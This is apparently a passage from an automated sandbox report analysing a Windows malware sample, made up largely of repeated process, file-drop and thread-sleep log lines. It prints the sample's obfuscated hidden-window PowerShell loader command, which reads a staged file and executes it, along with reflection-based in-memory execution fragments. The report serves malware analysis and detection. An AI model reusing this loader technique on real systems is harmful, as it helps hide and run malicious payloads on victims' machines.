            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Detaljeprojekteringers $Grassersmpoverishing235 $Fyldpladsen82), (Enkesder @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Heliographs = [AppDomain]::Curre
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pittosporaceae)), $Springiest26).DefineDynamicModule($Fibronuclear, $false).DefineType($Ankerkdes, $Wholesomer, [System.MulticastDeleg
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) "
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) "Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DF891E pushad ; iretd 11_2_02DF891F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DF8C2F pushfd ; iretd 11_2_02DF8C30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02DF8DDF push esp; iretd 11_2_02DF8DE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04291D64 pushad ; retf 11_2_04291D70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04291039 pushfd ; iretd 11_2_04291088
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_042928FE push ebx; iretd 11_2_042928FF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04292922 push es; retf 11_2_04292949
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04292108 push esp; retf 11_2_04292109
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04291964 push FFFFFFFCh; iretd 11_2_04291977
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04291B88 push ebp; ret 11_2_04291B8E
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeFile created: C:\Users\user\AppData\Local\Temp\nss7012.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599436Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599216Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597797Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597688Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597563Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597202Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596724Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596370Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596248Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596137Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595688Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594990Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593491Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593365Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593213Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593068Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 592938Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3393Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6324Jump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss7012.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5936Thread sleep time: -11990383647911201s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -30437127721620741s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 336Thread sleep count: 1356 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 336Thread sleep count: 8449 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -599436s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -599216s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8188Thread sleep time: -598891s >= -30000sJump to behavior
